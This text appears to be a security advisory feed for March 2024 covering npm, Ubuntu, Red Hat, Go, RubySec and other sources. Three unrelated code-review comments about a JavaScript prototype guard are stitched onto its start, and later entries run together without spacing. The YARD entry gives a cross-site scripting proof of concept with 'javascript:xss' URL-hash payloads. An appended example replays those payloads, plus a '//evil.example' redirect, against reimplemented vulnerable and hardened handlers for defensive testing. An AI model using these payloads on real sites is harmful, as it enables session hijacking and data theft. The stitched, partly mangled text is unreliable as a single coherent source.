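Review bot: the guard inserted before `var update = await evaluate(expr.update, match, environment);` rejects a match on two conditions whose intent is not documented: `match.isPrototypeOf(result)` catches a match that sits on the prototype chain of `result`, and `match instanceof Object.constructor` catches function values, since `Object.constructor` is `Function`. Add a one-line comment naming both cases so a later reader does not "simplify" one away, and note that because the throw precedes `evaluate(expr.update, ...)`, no update expression is evaluated for a rejected match.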
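Review bot: `err.position = proc.position || err.position;` uses a truthiness test, so a `proc.position` of `0` is treated as absent and `err.position` is kept, while the line just above uses `typeof proc.token !== 'undefined'` for the equivalent fallback on `token`. If `0` is a valid position, use the same `typeof` test (`typeof proc.position !== 'undefined' ? proc.position : err.position`) so the two fallbacks behave consistently.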
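Review bot: the new "D1010" message, "Attempted to access the Javascript object prototype", describes only one of the two conditions the guard in the first hunk rejects (the other is a function value caught by `instanceof Object.constructor`); widen the wording or reference D1010 from the guard's comment so the error users see matches what was rejected. Also confirm that the trailing `// Javascript specific` comment is meant to annotate the added D1010 line rather than the existing `"T1010"` entry that follows it, since its placement at the end of the added line reads as the former.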
04.03.2024 22:43:49 | npm | [NPM:GHSA-R4PF-3V7R-HH55] electron-builder's NSIS installer - execute arbitrary code on the target machine (Windows only) (high)
### Impact
Windows-Only: The NSIS installer makes a system call to open cmd.exe via NSExec in the `.nsh` installer script. NSExec by default searches the current directory of where the installer is located before searching `PATH`. This means that if an attacker can place a malicious executable file named cmd.exe in the same folder as the installer, the installer will run the malicious file.
### Patches
Fixed in https://github.com/electron-userland/electron-builder/pull/8059
### Workarounds
None, it executes at the installer-level before the app is present on the system, so there's no way to check if it exists in a current installer.
### References
https://cwe.mitre.org/data/definitions/426.html
https://cwe.mitre.org/data/definitions/427
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-R4PF-3V7R-HH55

04.03.2024 18:14:41 | ubuntu | [USN-6674-2] Django vulnerability
Django could be made to consume resources or crash if it received specially crafted network traffic.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6674-2

04.03.2024 17:04:24 | ubuntu | [USN-6674-1] Django vulnerability
Django could be made to consume resources or crash if it received specially crafted network traffic.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6674-1

04.03.2024 16:23:13 | ubuntu | [USN-6673-1] python-cryptography vulnerabilities (high)
Several security issues were fixed in python-cryptography.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6673-1

04.03.2024 13:09:06 | ubuntu | [USN-6672-1] Node.js vulnerabilities (high)
Several security issues were fixed in Node.js.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6672-1

04.03.2024 05:02:03 | ubuntu | [USN-6669-1] Thunderbird vulnerabilities (high)
Several security issues were fixed in Thunderbird.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6669-1

04.03.2024 02:00:00 | cisa | [CISA-2024:0304] CISA Adds One Known Exploited Vulnerability to Catalog (high)
CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0304

04.03.2024 02:00:00 | debian | [DSA-5635-1] yard (medium)
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5635-1

04.03.2024 02:00:00 | mozilla | [MFSA-2024-11] Security Vulnerabilities fixed in Thunderbird 115.8.1 (high)
- CVE-2024-1936: Leaking of encrypted email subjects to other conversations (high)
The encrypted subject of an email message could be incorrectly and permanently assigned to an arbitrary other email message in Thunderbird's local cache. Consequently, when replying to the contaminated email message, the user might accidentally leak the confidential subject to a third party. While this update fixes the bug and avoids future message contamination, it does not automatically repair existing contaminations. Users are advised to use the repair folder functionality, which is available from the context menu of email folders, which will erase incorrect subject assignments.
https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-11

04.03.2024 02:00:00 | redhat | [RHSA-2024:1063] edk2 security update (important)
EDK (Embedded Development Kit) is a project to enable UEFI support for Virtual Machines. This package contains a sample 64-bit UEFI firmware for QEMU and KVM.
Security Fix(es):
* edk2: Buffer overflow in the DHCPv6 client via a long Server ID option (CVE-2023-45230)
* edk2: Buffer overflow when processing DNS Servers option in a DHCPv6 Advertise message (CVE-2023-45234)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1063

04.03.2024 19:51:31 | rustsec | [RUSTSEC-2024-0019] Tokens for named pipes may be delivered after deregistration
## Impact
When using named pipes on Windows, mio will under some circumstances return invalid tokens that correspond to named pipes that have already been deregistered from the mio registry. The impact of this vulnerability depends on how mio is used. For some applications, invalid tokens may be ignored or cause a warning or a crash. On the other hand, for applications that store pointers in the tokens, this vulnerability may result in a use-after-free.
For users of Tokio, this vulnerability is serious and can result in a use-after-free in Tokio.
The vulnerability is Windows-specific, and can only happen if you are using named pipes. Other IO resources are not affected.
## Affected versions
This vulnerability has been fixed in mio v0.8.11.
All versions of mio between v0.7.2 and v0.8.10 are vulnerable.
Tokio is vulnerable when you are using a vulnerable version of mio AND you are using at least Tokio v1.30.0. Versions of Tokio prior to v1.30.0 will ignore invalid tokens, so they are not vulnerable.
## Workarounds
Vulnerable libraries that use mio can work around this issue by detecting and ignoring invalid tokens.
## Technical details
When an IO resource registered with mio has a readiness event, mio delivers that readiness event to the user using a user-specified token. Mio guarantees that when an IO resource is [deregistered](https://docs.rs/mio/latest/mio/struct.Registry.html#method.deregister), then it will never return the token for that IO resource again. However, for named pipes on Windows, mio may sometimes deliver the token for a named pipe even though the named pipe has been previously deregistered.
This vulnerability was originally reported in the Tokio issue tracker: [tokio-rs/tokio#6369](https://github.com/tokio-rs/tokio/issues/6369)
This vulnerability was fixed in: [tokio-rs/mio#1760](https://github.com/tokio-rs/mio/pull/1760)
Thank you to [@rofoun](https://github.com/rofoun) and [@radekvit](https://github.com/radekvit) for discovering and reporting this issue.
https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0019

04.03.2024 12:52:07 | rubysec | [RUBYSEC:JSON-JWT-2023-51774] json-jwt allows bypass of identity checks via a sign/encryption confusion attack
The json-jwt (aka JSON::JWT) gem versions 1.16.5 and below sometimes allows bypass of identity checks via a sign/encryption confusion attack. For example, JWE can sometimes be used to bypass JSON::JWT.decode.
https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:JSON-JWT-2023-51774

04.03.2024 19:26:03 | maven | [MAVEN:GHSA-P5Q9-86W4-2XR5] SMTP smuggling in Apache James (moderate)
Apache James prior to versions 3.8.1 and 3.7.5 is vulnerable to SMTP smuggling. A lenient behaviour in line delimiter handling might create a difference of interpretation between the sender and the receiver which can be exploited by an attacker to forge an SMTP envelope, allowing for instance to bypass SPF checks. The patch implies enforcement of CRLF as a line delimiter as part of the DATA transaction. We recommend James users to upgrade to non vulnerable versions.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-P5Q9-86W4-2XR5

05.03.2024 00:42:13 | rubysec | [RUBYSEC:RACK-CORS-2024-27456] Rack CORS Middleware has Insecure File Permissions
rack-cors (aka Rack CORS Middleware) 2.0.1 has 0666 permissions for the .rb files.
https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:RACK-CORS-2024-27456

04.03.2024 02:00:00 | freebsd | [FREEBSD:0EF3398E-DA21-11EE-B23A-080027A5B8E9] Django -- multiple vulnerabilities
Django reports: CVE-2024-27351: Potential regular expression denial-of-service in django.utils.text.Truncator.words().
https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:0EF3398E-DA21-11EE-B23A-080027A5B8E9

05.03.2024 23:34:20 | go | [GO-2024-2610] Errors returned from JSON marshaling may break template escaping in html/template
If errors returned from MarshalJSON methods contain user controlled data, they may be used to break the contextual auto-escaping behavior of the html/template package, allowing for subsequent actions to inject unexpected content into templates.
https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2610

05.03.2024 23:34:11 | go | [GO-2024-2609] Comments in display names are incorrectly handled in net/mail
The ParseAddressList function incorrectly handles comments (text within parentheses) within display names. Since this is a misalignment with conforming address parsers, it can result in different trust decisions being made by programs using different parsers.
https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2609

05.03.2024 23:34:02 | go | [GO-2024-2600] Incorrect forwarding of sensitive headers and cookies on HTTP redirect in net/http
When following an HTTP redirect to a domain which is not a subdomain match or exact match of the initial domain, an http.Client does not forward sensitive headers such as "Authorization" or "Cookie". For example, a redirect from foo.com to www.foo.com will forward the Authorization header, but a redirect to bar.com will not. A maliciously crafted HTTP redirect could cause sensitive headers to be unexpectedly forwarded.
https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2600

05.03.2024 23:33:49 | go | [GO-2024-2599] Memory exhaustion in multipart form parsing in net/textproto and net/http
When parsing a multipart form (either explicitly with Request.ParseMultipartForm or implicitly with Request.FormValue, Request.PostFormValue, or Request.FormFile), limits on the total size of the parsed form were not applied to the memory consumed while reading a single form line. This permits a maliciously crafted input containing very long lines to cause allocation of arbitrarily large amounts of memory, potentially leading to memory exhaustion. With fix, the ParseMultipartForm function now correctly limits the maximum size of form lines.
https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2599

05.03.2024 23:33:39 | go | [GO-2024-2598] Verify panics on certificates with an unknown public key algorithm in crypto/x509
Verifying a certificate chain which contains a certificate with an unknown public key algorithm will cause Certificate.Verify to panic. This affects all crypto/tls clients, and servers that set Config.ClientAuth to VerifyClientCertIfGiven or RequireAndVerifyClientCert. The default behavior is for TLS servers to not verify client certificates.
https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2598

05.03.2024 23:23:09 | slackware | [SSA:2024-065-01] mozilla-thunderbird
New mozilla-thunderbird packages are available for Slackware 15.0 and -current to fix a security issue.
**Here are the details from the Slackware 15.0 ChangeLog**
```
patches/packages/mozilla-thunderbird-115.8.1-i686-1_slack15.0.txz: Upgraded.
  This release contains security fixes and improvements.
  For more information, see:
    https://www.mozilla.org/en-US/thunderbird/115.8.1/releasenotes/
    https://www.mozilla.org/en-US/security/advisories/mfsa2024-11/
    https://www.cve.org/CVERecord?id=CVE-2024-1936
  (* Security fix *)
```
**Where to find the new packages**
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-thunderbird-115.8.1-i686-1_slack15.0.txz
Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-thunderbird-115.8.1-x86_64-1_slack15.0.txz
Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-thunderbird-115.8.1-i686-1.txz
Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-thunderbird-115.8.1-x86_64-1.txz
**MD5 signatures**
Slackware 15.0 package:
a0fa5c1ccacab43f8c3f607e231840f3 mozilla-thunderbird-115.8.1-i686-1_slack15.0.txz
Slackware x86_64 15.0 package:
08089e8a210cf2ea4cb4beedb0f36c04 mozilla-thunderbird-115.8.1-x86_64-1_slack15.0.txz
Slackware -current package:
b8d025d0f32492718a184b06094bebc4 xap/mozilla-thunderbird-115.8.1-i686-1.txz
Slackware x86_64 -current package:
0d3c09a79ae6d5623f5d1b2ae9a50cb4 xap/mozilla-thunderbird-115.8.1-x86_64-1.txz
**Installation instructions**
Upgrade the package as root:
`# upgradepkg mozilla-thunderbird-115.8.1-i686-1_slack15.0.txz`
https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-065-01

05.03.2024 21:49:11 | go | [GO-2024-2611] Infinite loop in JSON unmarshaling in google.golang.org/protobuf
The protojson.Unmarshal function can enter an infinite loop when unmarshaling certain forms of invalid JSON. This condition can occur when unmarshaling into a message which contains a google.protobuf.Any value, or when the UnmarshalOptions.DiscardUnknown option is set.
https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2611

05.03.2024 20:46:35 | ubuntu | [USN-6678-1] libgit2 vulnerabilities (critical)
Several security issues were fixed in libgit2.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6678-1

05.03.2024 20:39:19 | ubuntu | [USN-6677-1] libde265 vulnerabilities (high)
Several security issues were fixed in libde265.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6677-1

05.03.2024 18:24:32 | npm | [NPM:GHSA-86FC-F9GR-V533] HTTP Handling Vulnerability in the Bare server (critical)
### Impact
This vulnerability relates to insecure handling of HTTP requests by the @tomphttp/bare-server-node package. This flaw potentially exposes the users of the package to manipulation of their web traffic. The impact may vary depending on the specific usage of the package but it can potentially affect any system where this package is in use.
### Patches
Yes, the problem has been patched. We advise all users to upgrade to version @tomphttp/bare-server-node@2.0.2 as soon as possible.
### Workarounds
Given the nature of the vulnerability, the most effective solution is to upgrade to the patched version of the package. Specific workaround strategies will be disclosed later due to security considerations.
### References
Further information about this vulnerability will be provided at a later date to provide users with an opportunity to upgrade to a patched version and to prevent potential exploitation of the vulnerability. Users are advised to follow the repository announcements and updates.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-86FC-F9GR-V533

05.03.2024 17:57:04 | ubuntu | [USN-6675-1] ImageProcessing vulnerability (critical)
ImageProcessing could be made to crash or run programs as an administrator if it received specially crafted input.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6675-1

05.03.2024 02:00:00 | cisa | [CISA-2024:0305] CISA Adds 2 Known Exploited Vulnerabilities to Catalog (critical)
CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0305

05.03.2024 02:00:00 | redhat | [RHSA-2024:1075] edk2 security update (important)
EDK (Embedded Development Kit) is a project to enable UEFI support for Virtual Machines. This package contains a sample 64-bit UEFI firmware for QEMU and KVM.
Security Fix(es):
* edk2: Buffer overflow in the DHCPv6 client via a long Server ID option (CVE-2023-45230)
* edk2: Buffer overflow when processing DNS Servers option in a DHCPv6 Advertise message (CVE-2023-45234)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1075

05.03.2024 02:00:00 | redhat | [RHSA-2024:1129] curl security update (moderate)
The curl packages provide the libcurl library and the curl utility for downloading files from servers using various protocols, including HTTP, FTP, and LDAP.
Security Fix(es):
* curl: information disclosure by exploiting a mixed case flaw (CVE-2023-46218)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1129

05.03.2024 02:00:00 | redhat | [RHSA-2024:1130] openssh security update (moderate)
OpenSSH is an SSH protocol implementation supported by a number of Linux, UNIX, and similar operating systems. It includes the core files necessary for both the OpenSSH client and server.
Security Fix(es):
* ssh: Prefix truncation attack on Binary Packet Protocol (BPP) (CVE-2023-48795)
* openssh: potential command injection via shell metacharacters (CVE-2023-51385)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1130

05.03.2024 02:00:00 | redhat | [RHSA-2024:1131] golang security update (moderate)
The golang packages provide the Go programming language compiler.
Security Fix(es):
* golang: net/http/internal: Denial of Service (DoS) via Resource Consumption via HTTP requests (CVE-2023-39326)
* golang: cmd/go: Protocol Fallback when fetching modules (CVE-2023-45285)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1131

05.03.2024 02:00:00 | redhat | [RHSA-2024:1134] tomcat security update (important)
Apache Tomcat is a servlet container for the Java Servlet and JavaServer Pages (JSP) technologies.
Security Fix(es):
* tomcat: HTTP request smuggling via malformed trailer headers (CVE-2023-46589)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1134

05.03.2024 02:00:00 | redhat | [RHSA-2024:1139] keylime security update (low)
Keylime is a TPM based highly scalable remote boot attestation and runtime integrity measurement solution.
Security Fix(es):
* keylime: Attestation failure when the quote's signature does not validate (CVE-2023-3674)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1139

05.03.2024 02:00:00 | redhat | [RHSA-2024:1142] haproxy security update (moderate)
The haproxy packages provide a reliable, high-performance network load balancer for TCP and HTTP-based applications.
Security Fix(es):
* haproxy: Proxy forwards malformed empty Content-Length headers (CVE-2023-40225)
* haproxy: untrimmed URI fragments may lead to exposure of confidential data on static servers (CVE-2023-45539)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1142

05.03.2024 02:00:00 | redhat | [RHSA-2024:1147] rear security update (moderate)
Relax-and-Recover is a recovery and system migration utility. The utility produces a bootable image and restores from backup using this image. It allows to restore to different hardware and can therefore be also used as a migration utility.
Security Fix(es):
* rear: creates a world-readable initrd (CVE-2024-23301)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1147

05.03.2024 02:00:00 | redhat | [RHSA-2024:1149] skopeo security update (moderate)
The skopeo command lets you inspect images from container image registries, get images and image layers, and use signatures to create and verify files.
Security Fix(es):
* golang: net/http/internal: Denial of Service (DoS) via Resource Consumption via HTTP requests (CVE-2023-39326)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1149

05.03.2024 02:00:00 | redhat | [RHSA-2024:1150] buildah security update (moderate)
The buildah package provides a tool for facilitating building OCI container images. Among other things, buildah enables you to: Create a working container, either from scratch or using an image as a starting point; Create an image, either from a working container or using the instructions in a Dockerfile; Build both Docker and OCI images.
Security Fix(es):
* ssh: Prefix truncation attack on Binary Packet Protocol (BPP) (CVE-2023-48795)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1150

05.03.2024 02:00:00 | redhat | [RHSA-2024:1141] mysql security update (moderate)
MySQL is a multi-user, multi-threaded SQL database server. It consists of the MySQL server daemon (mysqld) and many client programs and libraries.
Security Fix(es):
* mysql: InnoDB unspecified vulnerability (CPU Apr 2023) (CVE-2023-21911)
* mysql: Server: DDL unspecified vulnerability (CPU Apr 2023) (CVE-2023-21919, CVE-2023-21929, CVE-2023-21933)
* mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2023) (CVE-2023-21920, CVE-2023-21935, CVE-2023-21945, CVE-2023-21946, CVE-2023-21976, CVE-2023-21977, CVE-2023-21982)
* mysql: Server: Components Services unspecified vulnerability (CPU Apr 2023) (CVE-2023-21940, CVE-2023-21947, CVE-2023-21962)
* mysql: Server: Partition unspecified vulnerability (CPU Apr 2023) (CVE-2023-21953)
* mysql: Server: Partition unspecified vulnerability (CPU Apr 2023) (CVE-2023-21955)
* mysql: Server: JSON unspecified vulnerability (CPU Apr 2023) (CVE-2023-21966)
* mysql: Server: DML unspecified vulnerability (CPU Apr 2023) (CVE-2023-21972)
* mysql: Client programs unspecified vulnerability (CPU Apr 2023) (CVE-2023-21980)
* mysql: Server: Replication unspecified vulnerability (CPU Jul 2023) (CVE-2023-22005, CVE-2023-22007, CVE-2023-22057)
* mysql: InnoDB unspecified vulnerability (CPU Jul 2023) (CVE-2023-22008)
* mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2023) (CVE-2023-22032, CVE-2023-22059, CVE-2023-22064, CVE-2023-22065, CVE-2023-22070, CVE-2023-22078, CVE-2023-22079, CVE-2023-22092, CVE-2023-22103, CVE-2023-22110, CVE-2023-22112)
* mysql: InnoDB unspecified vulnerability (CPU Jul 2023) (CVE-2023-22033)
* mysql: Server: Optimizer unspecified vulnerability (CPU Jul 2023) (CVE-2023-22046)
* mysql: Client programs unspecified vulnerability (CPU Jul 2023) (CVE-2023-22053, CVE-2023-22054, CVE-2023-22056)
* mysql: Server: DDL unspecified vulnerability (CPU Jul 2023) (CVE-2023-22058)
* mysql: InnoDB unspecified vulnerability (CPU Oct 2023) (CVE-2023-22066, CVE-2023-22068, CVE-2023-22084, CVE-2023-22097, CVE-2023-22104, CVE-2023-22114)
* mysql: Server: UDF unspecified vulnerability (CPU Oct 2023) (CVE-2023-22111)
* mysql: Server: DML unspecified vulnerability (CPU Oct 2023) (CVE-2023-22115)
* mysql: Server: RAPID unspecified vulnerability (CPU Jan 2024) (CVE-2024-20960)
* mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2024) (CVE-2024-20961, CVE-2024-20962, CVE-2024-20965, CVE-2024-20966, CVE-2024-2097, CVE-2024-20971, CVE-2024-20972, CVE-2024-20973, CVE-2024-20974, CVE-2024-20976, CVE-2024-20977, CVE-2024-20978, CVE-2024-20982)
* mysql: Server: Security: Encryption unspecified vulnerability (CPU Jan 2024) (CVE-2024-20963)
* mysql: Server: Security: Privileges unspecified vulnerability (CPU Jan 2024) (CVE-2024-20964)
* mysql: Server: Replication unspecified vulnerability (CPU Jan 2024) (CVE-2024-20967)
* mysql: Server: Options unspecified vulnerability (CPU Jan 2024) (CVE-2024-20968)
* mysql: Server: DDL unspecified vulnerability (CPU Jan 2024) (CVE-2024-20969)
* mysql: Server: DDL unspecified vulnerability (CPU Jan 2024) (CVE-2024-20981)
* mysql: Server: DML unspecified vulnerability (CPU Jan 2024) (CVE-2024-20983)
* mysql: Server: Security: Firewall unspecified vulnerability (CPU Jan 2024) (CVE-2024-20984)
* mysql: Server: UDF unspecified vulnerability (CPU Jan 2024) (CVE-2024-20985)
* zstd: mysql: buffer overrun in util.c (CVE-2022-4899)
* mysql: Server: Security: Privileges unspecified vulnerability (CPU Jul 2023) (CVE-2023-22038)
* mysql: Server: Pluggable Auth unspecified vulnerability (CPU Jul 2023) (CVE-2023-22048)
* mysql: Server: Security: Encryption unspecified vulnerability (CPU Oct 2023) (CVE-2023-22113)
Bug Fix(es):
* Fix for MySQL bug #33630199 in 8.0.32 introduces regression when --set-gtid-purged=OFF (RHEL-22454)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1141

06.03.2024 01:05:54maven[MAVEN:GHSA-VR64-R9QJ-H27F] Reading specially crafted serializable objects from an untrusted source may cause an infinite loop and denial of service (moderate)Any program on the JVM may read serialized objects via [java.io.ObjectInputStream.readObject()](https://docs.oracle.com/javase/8/docs/api/java/io/ObjectInputStream.html#readObject--). Reading serialized objects from an untrusted source is **inherently unsafe** (this affects any program running on any version of the JVM) and is a prerequisite for this vulnerability.Clojure classes that represent infinite seqs (Cycle, infinite Repeat, and Iterate) do not define hashCode() and use the parent ASeq.hashCode(), which walks the seq to compute the hash, yielding an infinite loop. Classes like java.util.HashMap call hashCode() on keys during deserialization of a serialized map. The exploit requires:1. Crafting a serialized HashMap object with an infinite seq object as a key.2. Sending that to a program that reads serialized objects via ObjectInputStream.readObject().This will cause the program to enter an infinite loop on the reading thread and thus a denial of service (DoS).The affected Clojure classes (Cycle, Repeat, Iterate) exist in Clojure 1.2.0-1.12.0-alpha8.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-VR64-R9QJ-H27F
05.03.2024 03:31:53rustsec[RUSTSEC-2024-0020] Stack buffer overflow with whoami on illumos and SolarisWith older versions of the whoami crate, calling the `username` function leads to an immediate stack buffer overflow on illumos and Solaris. Denial of service and data corruption have both been observed in the wild, and the issue is possibly exploitable as well.This also affects any other Unix platforms that aren't any of: `linux`, `macos`, `freebsd`, `dragonfly`, `bitrig`, `openbsd`, `netbsd`.This issue has been addressed in whoami 1.5.0.For more information, see [this GitHub issue](https://github.com/ardaku/whoami/issues/91).https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0020
05.03.2024 20:43:56rubysec[RUBYSEC:YARD-2024-27285] YARD's default template vulnerable to Cross-site Scripting in generated frames.html (medium)### SummaryThe "frames.html" file within the Yard Doc's generated documentation is vulnerable to Cross-Site Scripting (XSS) attacks due to inadequate sanitization of user input within the JavaScript segment of the "frames.erb" template file.### DetailsThe vulnerability stems from mishandling user-controlled data retrieved from the URL hash in the embedded JavaScript code within the "frames.erb" template file. Specifically, the script lacks proper sanitization of the hash data before utilizing it to establish the top-level window's location. This oversight permits an attacker to inject malicious JavaScript payloads through carefully crafted URLs.Snippet from "frames.erb":(v0.9.34)```erb<script type="text/javascript"> var match = unescape(window.location.hash).match(/^#!(.+)/); var name = match ? match[1] : '<%= url_for_main %>'; name = name.replace(/^(\w+):\/\//, '').replace(/^\/\//, ''); window.top.location = name;</script>```(v0.9.35)```erb<script type="text/javascript"> var match = decodeURIComponent(window.location.hash).match(/^#!(.+)/); var name = match ? match[1] : '<%= url_for_main %>'; name = name.replace(/^((\w*):)?[\/\\]*/gm, '').trim(); window.top.location.replace(name)</script>```### PoC (Proof of Concept)To exploit this vulnerability:1. Gain access to the generated Yard Doc.2. Locate and access the "frames.html" file.3. Construct a URL containing the malicious payload in the hash segment, for instance: `#!javascript:xss` for v0.9.34, and `#:javascript:xss` for v0.9.35### ImpactThis XSS vulnerability presents a substantial threat by enabling an attacker to execute arbitrary JavaScript code within the user's session context. Potential ramifications include session hijacking, theft of sensitive data, unauthorized access to user accounts, and defacement of websites. Any user visiting the compromised page is susceptible to exploitation. It is critical to promptly address this vulnerability to mitigate potential harm to users and preserve the application's integrity.https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:YARD-2024-27285
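As an added example (not YARD's own code), the two `frames.erb` hash handlers quoted in the advisory above are reimplemented as pure functions so their behaviour on the PoC hashes can be checked offline, next to an origin-based check a template could use instead. Note that both templates only consult a hash that begins with `#!`, so the 0.9.35 bypass is exercised here as `#!:javascript:xss`; the documentation base URL and the fallback main page are assumed values.

```javascript
// Added example, not YARD's own code: the 0.9.34 and 0.9.35 hash handling from
// frames.erb as pure functions, plus an origin check that a template could use
// instead. `unescape` is the legacy global the 0.9.34 template relied on.

// 0.9.34: strips only a leading "scheme://" or "//", so "javascript:xss" survives.
function legacyTarget_0_9_34(hash, fallback) {
  const match = unescape(hash).match(/^#!(.+)/);
  let name = match ? match[1] : fallback;
  name = name.replace(/^(\w+):\/\//, '').replace(/^\/\//, '');
  return name; // the value the template assigns to window.top.location
}

// 0.9.35: strips one leading "word:" plus slashes (anchored at line start), so
// ":javascript:xss" loses only its first ":" and becomes "javascript:xss".
function legacyTarget_0_9_35(hash, fallback) {
  const match = decodeURIComponent(hash).match(/^#!(.+)/);
  let name = match ? match[1] : fallback;
  name = name.replace(/^((\w*):)?[\/\\]*/gm, '').trim();
  return name;
}

// Hardened variant: resolve the candidate against the page's own URL and accept
// it only if the result stays on the same origin. javascript:, data:,
// protocol-relative and backslash-prefixed targets all fail the comparison.
function sameOriginTarget(hash, fallback, baseHref) {
  let decoded;
  try {
    decoded = decodeURIComponent(hash);
  } catch {
    return fallback; // malformed percent-encoding
  }
  const match = decoded.match(/^#!(.+)/);
  const candidate = match ? match[1] : fallback;
  let url;
  try {
    url = new URL(candidate, baseHref);
  } catch {
    return fallback; // unparseable
  }
  if (url.origin !== new URL(baseHref).origin) return fallback;
  return url.href; // absolute, same-origin
}

// Assumed values for the demo: a docs site and its default main page.
const BASE = 'https://docs.example.com/yard/frames.html';
const MAIN = 'index.html';

// Runs the PoC hashes through all three handlers side by side.
function demo() {
  const hashes = ['#!javascript:xss', '#!:javascript:xss', '#!//evil.example/x', '#!file_list.html'];
  return hashes.map((h) => ({
    hash: h,
    v34: legacyTarget_0_9_34(h, MAIN),
    v35: legacyTarget_0_9_35(h, MAIN),
    safe: sameOriginTarget(h, MAIN, BASE),
  }));
}

if (typeof require !== 'undefined' && require.main === module) console.table(demo());
```

The origin comparison is the whole check: there is no attempt to enumerate dangerous schemes, because the URL parser already decides what `javascript:`, `data:` or `//host` resolve to, and anything that does not resolve back to the documentation's own origin is replaced by the default page.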
06.03.2024 22:17:21maven[MAVEN:GHSA-8H2M-54WH-GWJ3] Jenkins docker-build-step Plugin missing permission check (moderate)A missing permission check in an HTTP endpoint in Jenkins docker-build-step Plugin 2.11 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified TCP or Unix socket URL, and to reconfigure the plugin using the provided connection test parameters, affecting future build step executions.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8H2M-54WH-GWJ3
06.03.2024 22:16:53maven[MAVEN:GHSA-64C5-R2H5-C2FG] Jenkins docker-build-step Plugin Cross-Site Request Forgery vulnerability (moderate)A cross-site request forgery (CSRF) vulnerability in Jenkins docker-build-step Plugin 2.11 and earlier allows attackers to connect to an attacker-specified TCP or Unix socket URL, and to reconfigure the plugin using the provided connection test parameters, affecting future build step executions.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-64C5-R2H5-C2FG
